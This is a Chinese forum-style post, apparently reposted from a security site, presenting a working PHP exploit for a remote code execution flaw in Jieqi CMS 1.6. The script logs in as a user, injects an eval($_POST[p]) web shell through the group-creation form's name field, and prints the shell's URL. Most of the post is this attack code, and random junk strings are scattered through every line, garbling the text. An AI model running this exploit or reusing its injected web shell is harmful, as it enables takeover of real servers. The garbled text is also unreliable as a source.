杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
" G6 \/ C5 I2 s! l X$ [8 b S
5 |" i; Y) {2 c: E6 I' S; c- Z6 C: I ; k& O. d& N# n0 U; h
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。/ C( H* Q6 O5 c: I5 ?7 |
需要有一个能创建圈子的用户。6 B2 l4 x1 W9 J, O) e
( o$ s! _% Q4 x @<?php
/ z; n) ~* N1 I$ J! v9 ~+ W7 U - S. D C2 y# F5 M. F0 V
print_r('- ]2 V" i- T4 c4 r
+---------------------------------------------------------------------------+/ y; X* r( z z1 A2 j+ a& ]: N
Jieqi CMS V1.6 PHP Code Injection Exploit. C8 T& Q* m6 ~$ h2 R7 o' g
by flyh4t
& r; \: j% q8 v: j2 Pmail: phpsec at hotmail dot com" ^+ N" @) U9 G
team: http://www.wolvez.org
5 S& h* Y$ O/ t# L" X2 o+---------------------------------------------------------------------------+" u# m5 |# |5 {* a% U; y
'); /**& d! T! p+ y1 l6 ]' n' E# ?4 s
* works regardless of php.ini settings" h( h( g: e7 Z( H
*/ if ($argc < 5) { print_r('
$ n% G9 Q. t" a) `* q( n7 T+ d; z+---------------------------------------------------------------------------+
# d& M; f4 _) s' S% {1 |) l! m) mUsage: php '.$argv[0].' host path username6 W& ~2 w2 Z( B
host: target server (ip/hostname)
. h9 U4 j& e+ I9 k, Q7 y! ypath: path to jieqicms
4 [: u' }3 J1 ~( Z# H6 A+ guasename: a username who can create group
( e$ V' i* b3 r' x$ Z" lExample:: ~; S9 k5 Z5 `8 x( p; b$ ]
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
; o. ~. X. ?0 c+---------------------------------------------------------------------------+5 d: {2 d* \6 p$ [' x# v0 k
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
' G7 }# z( ~$ }) e0 CContent-Disposition: form-data; name="gname"9 f4 z! ~5 F6 L( J9 R3 i. T
0 c0 B- l. x4 I'; $params .="';"; $params .='eval($_POST[p]);//flyh4t/ Y8 V |5 \; z
-----------------------------232811682799610 b" U; Y7 X, J" t! w- F' w7 {
Content-Disposition: form-data; name="gcatid"' f; V+ [' T# u5 I
Y+ y+ {& }3 h1
) E A, E& M1 r% r6 r8 ^; V4 @9 J& s$ U( L-----------------------------23281168279961* d) z5 |4 u v. c
Content-Disposition: form-data; name="gaudit"& z* i6 N/ a1 y" T1 {
7 D1 N( M F$ `! J0 a1
~! @' p$ |8 D% d# V6 b-----------------------------23281168279961
1 b" R/ q W: M, Z7 DContent-Disposition: form-data; name="gbrief") p$ B3 H6 ]: O% L& B1 a' F
& K1 l. V" R ]1
M0 W k$ v$ w C1 a-----------------------------23281168279961--1 L! n3 H" c4 Z4 C4 n8 V9 y% `
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
; A+ _# A& w& G
: N, s' E* Q3 O- `preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |